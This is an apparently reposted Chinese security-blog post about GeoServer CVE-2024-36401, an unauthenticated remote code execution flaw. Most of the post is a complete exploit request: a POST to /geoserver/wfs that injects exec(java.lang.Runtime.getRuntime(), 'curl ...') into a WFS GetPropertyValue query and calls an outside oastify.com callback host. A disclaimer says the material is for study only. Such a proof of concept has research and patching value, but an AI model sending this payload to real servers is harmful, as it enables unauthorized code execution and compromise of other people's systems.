本公众号所发布的文章及工具只用于网络安全交流学习,请勿进行非法渗透。
漏洞详情
GeoServer
是
OpenGIS
Web
服务器规范的
J2EE
实现,利用
GeoServer
可以方便的发布地图数据
允许用户对特征数据进行更新、删除、插入操作。
在
GeoServer
2
.25
.1
, 2
.24
.3
, 2
.23
.5
版本及以前
未登录的任意用户可以通过构造恶意
OGC
请求,在默认安装的服务器中执行
XPath
表达式
进而利用执行
Apache
Commons
Jxpath
提供的功能执行任意代码。
EXP/POC:
注意 typeNames=
'sf:archsites'
POST /geoserver/wfs HTTP/
1.1
Host: x.x.x.x:
8080
User-Agent: Mozilla/
5.0
(Windows NT
10.0
; Win64; x64) AppleWebKit/
537.36
(KHTML, like Gecko) Chrome/
124.0
.6367
.118
Safari/
537.36
Content-Type: application/xml
Content-Length:
390
<wfs:GetPropertyValue service=
'WFS'
version=
'2.0.0'
xmlns:topp=
'http://www.openplans.org/topp'
xmlns:fes=
'http://www.opengis.net/fes/2.0'
xmlns:wfs=
'http://www.opengis.net/wfs/2.0'
>
<wfs:Query typeNames='sf:archsites'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl 123.go8o0k83qmfdt7zwl3ne8brdq4wvkt8i.oastify.com')</wfs:valueReference>
</wfs:GetPropertyValue>
原文始发于微信公众号(清澜安全实验室):GeoServer CVE-2024-36401 附工具下载
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论